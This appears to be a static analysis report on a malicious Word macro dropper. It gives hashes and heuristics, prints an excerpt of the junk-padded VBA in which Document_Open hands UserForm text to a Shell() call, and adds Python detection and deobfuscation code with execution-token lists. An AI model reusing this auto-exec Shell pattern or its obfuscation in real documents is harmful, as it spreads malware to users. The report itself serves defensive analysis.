Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6dd5a12cae477b7e…

MALICIOUS

Office (OLE)

Size: 235.0 KB
Created: 2018-09-27 19:02:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: eba233b1240ca75add5f0a412d00ce48
SHA-1: 4fabad9538306aae967b005e9c5d0d01636c749b
SHA-256: 6dd5a12cae477b7edeb4cbfa667f40f1a6b8e6a7fdc205f899540358beddd5c0
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros, including a Document_Open procedure, which Word runs automatically as soon as the user enables content, and a Shell() call, so the document is built to execute a command with no further interaction once macros are allowed. In the extracted source, Document_Open creates a UserForm (frmMain) and passes the contents of one of its text boxes (frm.txtBox.Text) to the procedure Hitler; the command string is therefore held in the form's control data rather than as a literal in the macro source, a common way to keep the payload out of static macro scanners and out of the decoded VBA shown below. The "Document instructs the user to enable macros or editing" lure heuristic and the ClamAV detection Doc.Dropper.Agent-7085930-0 are consistent with a macro dropper. The VBA code is heavily padded with junk (counting loops, If blocks on constant-false arithmetic, comment-only branches, unused string assignments), but the Document_Open path to Shell() is clear.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-7085930-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7085930-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro code calls Shell(), which launches an external program or command line from inside Office
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open procedure is present; Word runs it automatically when the document is opened with macros enabled, so nothing beyond accepting the lure is needed to trigger the code
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable; here the decoded source was also recovered, so the two views can be cross-checked against each other.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    The document instructs the user to enable macros or editing, a common technique used by macro droppers to get past Office's default macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that appears in ordinary Office files, not a download or command-and-control location, and should not be treated as a network indicator.
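The three VBA heuristics above (Document_Open auto-execution, a Shell() call, and the p-code token scan used when no source can be decoded) boil down to token checks that are easy to reproduce. The Python below is an added example written for this page, not code from the report's analysis engine or from oletools: it runs those checks over extracted VBA source and, as a fallback, over raw module-stream bytes, and it also flags the pattern from the preview further down, where Document_Open hands a UserForm text box value (frm.txtBox.Text) to the procedure that is executed. The sample VBA and the byte string are constructed for the example; the Shell line and the USERFORM_PAYLOAD label are assumptions, since the page's preview is truncated before the flagged call.

```python
"""Added example (not part of the original report or its analysis engine):
re-implements the report's OLE_VBA_DOCOPEN, OLE_VBA_SHELL and
OLE_VBA_PCODE_AUTOEXEC_EXEC checks over extracted VBA source or raw stream
bytes, and flags the UserForm-control trick visible in the script preview."""
from __future__ import annotations
import re

# Procedure names Office runs without a click once content is enabled.
AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open", "autoexec",
            "autoclose", "auto_close", "document_close", "workbook_close", "autonew"}
# Tokens that run commands, fetch content or instantiate COM objects.
EXEC_TOKENS = ["Shell", "WScript.Shell", "CreateObject", "GetObject", "ShellExecute",
               "URLDownloadToFile", "XMLHTTP", "WinHttp", "ADODB.Stream", "powershell"]
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(", re.I | re.M)
NEW_FORM_RE = re.compile(r"\bSet\s+(\w+)\s*=\s*New\s+(\w+)", re.I)


def find_autoexec(src: str) -> list[str]:
    """Procedures whose names make Office run them automatically."""
    return [m.group(1) for m in PROC_RE.finditer(src) if m.group(1).lower() in AUTOEXEC]


def find_exec_tokens(src: str) -> list[str]:
    """Execution/download/object-creation tokens used in the source.
    The look-behind keeps 'Shell' from also matching inside 'WScript.Shell'."""
    return [t for t in EXEC_TOKENS
            if re.search(r"(?<![\w.])" + re.escape(t) + r"\b", src, re.I)]


def form_control_inputs(src: str) -> list[str]:
    """`Set x = New <form>` followed by `x.<control>.Text` (or .Caption/.Value/.Tag):
    the string fed to the macro lives in a UserForm control, which a plain
    macro-source extraction does not show."""
    refs = []
    for var, form in NEW_FORM_RE.findall(src):
        for m in re.finditer(rf"\b{re.escape(var)}\.(\w+)\.(Text|Caption|Value|Tag)\b", src, re.I):
            refs.append(f"{form}.{m.group(1)}.{m.group(2)}")
    return refs


def _present(blob: bytes, tok: str) -> bool:
    low, t = blob.lower(), tok.lower()  # bytes.lower() only touches ASCII letters
    return t.encode() in low or t.encode("utf-16-le") in low


def scan_raw_stream(blob: bytes) -> dict[str, list[str]]:
    """Fallback for p-code-only / extraction-failure cases: look for the same
    tokens as ASCII or UTF-16LE byte strings in the raw module stream."""
    return {"autoexec": [t for t in sorted(AUTOEXEC) if _present(blob, t)],
            "exec": [t for t in EXEC_TOKENS if _present(blob, t)]}


def triage(src: str = "", raw: bytes = b"") -> dict:
    """Combine the checks into the report's heuristic labels
    (USERFORM_PAYLOAD is a label made up for this example)."""
    autoexec, exec_tokens = find_autoexec(src), find_exec_tokens(src)
    form_refs, labels = form_control_inputs(src), set()
    if "document_open" in {p.lower() for p in autoexec}:
        labels.add("OLE_VBA_DOCOPEN")
    if {"Shell", "WScript.Shell"} & set(exec_tokens):
        labels.add("OLE_VBA_SHELL")
    if form_refs:
        labels.add("USERFORM_PAYLOAD")
    if raw:
        hits = scan_raw_stream(raw)
        if hits["autoexec"] and hits["exec"]:
            labels.add("OLE_VBA_PCODE_AUTOEXEC_EXEC")
    return {"autoexec": autoexec, "exec_tokens": exec_tokens,
            "form_inputs": form_refs, "labels": sorted(labels)}


# Constructed sample modelled on the script preview. The `Shell` line is an
# assumption: the page's preview is truncated before the call the heuristics flag.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "ThGYm"
Sub Hitler(gs2O8d)
If 1580 / 4 = 22425 / 4485 Then
vIxFgn = "WMalWjh"
End If
Shell gs2O8d, vbHide
End Sub
'''
# Constructed stand-in for a compiled/cache stream where only raw bytes survive.
SAMPLE_RAW = b"\x00\x01" + "Document_Open".encode("utf-16-le") + b"\x00\x00Shell\x00"

if __name__ == "__main__":
    print(triage(SAMPLE_VBA, SAMPLE_RAW))
```

The UserForm check is the one that matters operationally here: the decoded macro source tells you that something is passed to Shell(), but the command itself sits in the form's storage streams (the control data in the UserForm's `o` stream), so it has to be dumped from there (oletools ships an oleform parser for this) or recovered by detonating the document, not read from macros.bas.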

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 63988 bytes
SHA-256: 5a8a1927b9977b41abf95d1993ddf2d8a962fa93086b0d29935ca8fed8854ede

Script preview: first 1,000 lines of the extracted source (truncated below)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "ThGYm"
Sub Hitler(gs2O8d)
Dim F1pJDiq
F1pJDiq = 198
While F1pJDiq < 641
F1pJDiq = F1pJDiq + 20
Wend
IKcmCB = "HRrZCSu72"
LCpmodYMt = gBnKbWUv & F1pJDiq
Dim at6rSu
at6rSu = 198
While at6rSu <= 641
at6rSu = at6rSu + 20
Wend
qLQ0niU = 27899
XkR0jFcW = UmnQBDEq & at6rSu
If 1580 / 4 = 22425 / 4485 Then
vIxFgn = "WMalWjh"
End If
vyGgF75 = 27899
tnoPvT = vIxFgn & vyGgF75
Dim yIZENr52V
yIZENr52V = 211
While yIZENr52V <= 381
yIZENr52V = yIZENr52V + 22
Wend
Tha0C = "rjHVS93"
xWwf64hV = OiBeX5lx & yIZENr52V
If 12 < 160 Then
' Wrut9c
Else
' oMUZHE
Debug.Print "slFG9wqV"
End If
If 17 < 213 Then
' pUWAFTKg
Else
' Yd93wJPcp
Debug.Print "zIZTu"
End If
Dim OLWar
OLWar = 42
While OLWar <= 768
OLWar = OLWar + 10
Wend
GqbRQ6o = "jEwlko"
RlviQ = GG5NMIy & OLWar
If 734 + 8 = 7983 / 2661 Then
JHfuX = "QDXoBV4"
End If
FnjHyIcuk = "NUOwH"
MmUzHFa = JHfuX & FnjHyIcuk
If 734 + 8 = 7983 / 2661 Then
YLziZkn = "tzUxnM"
End If
KKZUbwSc = "wFjUXJ5Q"
VM2CTDQnz = YLziZkn & KKZUbwSc
Dim JXKTDeIW
JXKTDeIW = 169
While JXKTDeIW <= 964
JXKTDeIW = JXKTDeIW + 23
Wend
TcZMtGjFa = "ynagWEC7e"
ZUBZk = cGgoOeB8 & JXKTDeIW
If 59 < 186 Then
' d40tN
Else
' iBfz4iMZ
MsgBox "m3w6SxGN"
End If
If 59 < 186 Then
' VCAZiqhc
Else
' IdZALGSJa
MsgBox "MzLbBxPn"
End If
If 53 < 255 Then
' QQeM5UjC0
Else
' cVMhax
Debug.Print "EQUqVg9NP"
End If
Dim YLPIk
YLPIk = 175
While YLPIk < 328
YLPIk = YLPIk + 13
Wend
yDnCg14r = 5733
aSPdBxEy = T9fxVl & YLPIk
Dim IcvMNCbt
IcvMNCbt = 213
While IcvMNCbt <= 946
IcvMNCbt = IcvMNCbt + 21
Wend
Le16xY = "yD7Emk2"
vCLFWow5O = h013Kn & IcvMNCbt
If 28798 / 34 = 27342 / 27342 Then
jNlsXTUAQ = "hiKThg"
End If
BKQMkvxS = 35593
nYTE0do1f = jNlsXTUAQ & BKQMkvxS
If 28798 / 34 = 27342 / 27342 Then
R6zchpMA = "nqd4Ebt"
End If
oBWGKw = "T7056Z"
zNQFcvD = R6zchpMA & oBWGKw
If 20 < 220 Then
' xt1Cy
Else
' dFt0K6m
MsgBox "sBoDH7mZ"
End If
If 965 - 34 = -994 + 1005 Then
gPN5JIaGB = "mcLZple"
End If
U3Ac5n = "B8kVQCsv"
DzgqPSsED = gPN5JIaGB & U3Ac5n
Dim JzyxGk
JzyxGk = 28
While JzyxGk < 651
JzyxGk = JzyxGk + 22
Wend
QRuAGv = "HNgEonD0b"
id4yp = shf6j & JzyxGk
Dim BymKDRef
BymKDRef = 28
While BymKDRef < 651
BymKDRef = BymKDRef + 22
Wend
JTWg5G = 43086
yuJgIrq = o6HMCW5 & BymKDRef
If 965 - 34 = -994 + 1005 Then
soWAuGyHg = "OOK2P"
End If
qO76FVdAC = 43086
Wz8WEP = soWAuGyHg & qO76FVdAC
Dim KnVZR7
KnVZR7 = 161
While KnVZR7 <= 459
KnVZR7 = KnVZR7 + 64
Wend
OVOcSk0 = "wzSPhMmO0"
X1unZz = FC4VzBQ & KnVZR7
Dim cq8Jh6Z
cq8Jh6Z = 161
While cq8Jh6Z < 459
cq8Jh6Z = cq8Jh6Z + 64
Wend
nzgDIyMU = "UpjvbsNzw"
gjoceuq = QoA3HgBzM & cq8Jh6Z
If 420 - 26 = 12678 / 2113 Then
JKj7MWC = "jwgkGhaE"
End If
ohw7O = 31704
YVyOsk5 = JKj7MWC & ohw7O
If 420 - 26 = 12678 / 2113 Then
OCsgP = "FuymZ9Wo0"
End If
jl9bCQu = "keKPfL"
fBjGaS9mO = OCsgP & jl9bCQu
If 21320 / 26 = 24654 / 4109 Then
pzKPcsB = "MMtJP"
End If
ZQvBAX = "Ie102FO"
XKgWeb = pzKPcsB & ZQvBAX
If 21320 / 26 = 24654 / 4109 Then
iSzR2tn = "BZQdpfsHq"
End If
yoEO10 = "jYESj3Q"
rYsHbJM = iSzR2tn & yoEO10
If 21320 / 26 = 24654 / 4109 Then
DtAgoYGRQ = "SE67wdVt"
End If
XEfIGzAhO = 12905
VtEozPBY = DtAgoYGRQ & XEfIGzAhO
If 21320 / 26 = 24654 / 4109 Then
cCiZN6 = "MhGST"
End If
KSUJLsWd = "FEDxbC"
BtyDIFb = cCiZN6 & KSUJLsWd
Dim tDtKeG
tDtKeG = 20
While tDtKeG < 669
tDtKeG = tDtKeG + 55
Wend
q6CxyrX = "tu96ocCKe"
FEqv6Wjez = pXoaS0I8k & tDtKeG
If 42 < 245 Then
' MYKyM7o
Else
' hAanT
Debug.Print "HMkjbPi"
End If
If 223 - 23 = 857 - 841 Then
u5XQYh = "IY2E4K"
End If
WrDq5hfOw = 1642
h2JAbj3EU = u5XQYh & WrDq5hfOw
If 223 - 23 = 857 - 841 Then
Lcik8 = "zKrReq4AQ"
... (truncated)
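The preview above is padded with junk that follows a handful of fixed patterns: counting loops whose result only feeds an unused string, If blocks on constant arithmetic that is never true (1580 / 4 is 395, 22425 / 4485 is 5), If blocks whose condition is always true but whose only body is a comment, and Debug.Print or MsgBox calls sitting in unreachable Else branches. The Python below is an added example written for this page (not part of the report or the sample) that removes those patterns mechanically. Its SAMPLE is a constructed excerpt modelled on the preview, with a Shell line added as an assumption because the preview stops before the flagged call.

```python
"""Added example (not from the report or the sample): strip the preview's padding so the live statements stand out."""
import re

IF_RE, WHILE_RE = re.compile(r"^If\s+(.*?)\s+Then$", re.I), re.compile(r"^While\s+(.*)$", re.I)
ASSIGN_RE, DIM_RE = re.compile(r"^(\w+)\s*=\s*(.*)$"), re.compile(r"^Dim\s+(\w+)$", re.I)
KEYWORDS = {"call", "set", "new", "shell", "vbhide", "msgbox", "end", "sub", "if", "else"}

def const_eval(cond: str):
    """True/False for a predicate built only from literals (an opaque predicate), None if it mentions a variable."""
    if not re.fullmatch(r"[\d\s+\-*/().<>=]+", cond):
        return None
    expr = re.sub(r"(?<![<>!=])=(?!=)", "==", cond.replace("<>", "!="))
    try:
        return bool(eval(expr, {"__builtins__": {}}, {}))  # safe: digits and operators only, checked above
    except (SyntaxError, ZeroDivisionError):
        return None

def _parse(lines, i=0, stop=()):
    """Tree of plain lines, ('if', cond, then, else) and ('while', cond, body)."""
    nodes = []
    while i < len(lines) and lines[i].strip().lower() not in stop:
        ln = lines[i].strip()
        if m := IF_RE.match(ln):
            then_b, i = _parse(lines, i + 1, ("else", "end if"))
            else_b = []
            if i < len(lines) and lines[i].strip().lower() == "else":
                else_b, i = _parse(lines, i + 1, ("end if",))
            nodes.append(("if", m.group(1), then_b, else_b))
        elif m := WHILE_RE.match(ln):
            body, i = _parse(lines, i + 1, ("wend",))
            nodes.append(("while", m.group(1), body))
        else:
            nodes.append(ln)
        i += 1
    return nodes, i

def _fold(nodes):
    """Flatten: resolve constant Ifs, drop comments and Debug.Print lines."""
    out = []
    for n in nodes:
        if isinstance(n, str):
            if n and n[0] != "'" and not n.lower().startswith("debug.print"):
                out.append(n)
        elif n[0] == "while":
            out += [f"While {n[1]}", *_fold(n[2]), "Wend"]
        else:
            then_b, else_b, val = _fold(n[2]), _fold(n[3]), const_eval(n[1])
            if val is not None:
                out += then_b if val else else_b
            elif then_b or else_b:  # genuine branch on a variable: keep it
                out += [f"If {n[1]} Then", *then_b, *(["Else", *else_b] if else_b else []), "End If"]
    return out

def _idents(text):
    return [t for t in re.findall(r"[A-Za-z_]\w*", re.sub(r'"[^"]*"', '""', text)) if t.lower() not in KEYWORDS]

def _reads(lines):
    """Variables actually consumed; a loop's own bound check and `x = x + k` do not count."""
    reads = set()
    for ln in lines:
        if m := ASSIGN_RE.match(ln):
            if not re.fullmatch(rf"{m.group(1)}\s*[+\-]\s*\d+", m.group(2)):
                reads.update(_idents(m.group(2)))
        elif m := WHILE_RE.match(ln):
            reads.update(_idents(m.group(1))[1:])
        elif not DIM_RE.match(ln):
            reads.update(_idents(ln))
    return reads

def _eliminate(lines):
    """Drop Dim/stores of unread variables and (non-nested) loops with an unread counter; repeat until stable."""
    while True:
        reads, out, i = _reads(lines), [], 0
        while i < len(lines):
            m, w = DIM_RE.match(lines[i]) or ASSIGN_RE.match(lines[i]), WHILE_RE.match(lines[i])
            if m and m.group(1) not in reads:
                i += 1
            elif w and next(iter(_idents(w.group(1))), None) not in reads:
                i = lines.index("Wend", i) + 1
            else:
                out.append(lines[i])
                i += 1
        if out == lines:
            return out
        lines = out

def simplify_vba(src: str) -> str:
    nodes, _ = _parse(src.splitlines())
    return "\n".join(_eliminate(_fold(nodes)))

# Constructed excerpt modelled on the preview; the Shell line is an assumption (preview is truncated before it).
SAMPLE = '''Attribute VB_Name = "ThGYm"
Sub Hitler(gs2O8d)
Dim F1pJDiq
F1pJDiq = 198
While F1pJDiq < 641
F1pJDiq = F1pJDiq + 20
Wend
LCpmodYMt = gBnKbWUv & F1pJDiq
If 1580 / 4 = 22425 / 4485 Then
vIxFgn = "WMalWjh"
End If
If 12 < 160 Then
' Wrut9c
Else
Debug.Print "slFG9wqV"
End If
Shell gs2O8d, vbHide
End Sub
'''
```

Fed the full macros.bas, the same passes shrink it the same way; what survives is the Document_Open entry point, the UserForm lookup and whatever finally reaches Shell(). The eliminator treats a variable as live only if it is read somewhere other than its own loop bound or self-increment, and it assumes loops do not nest, which holds for this padding style but should be checked before reusing it on other families.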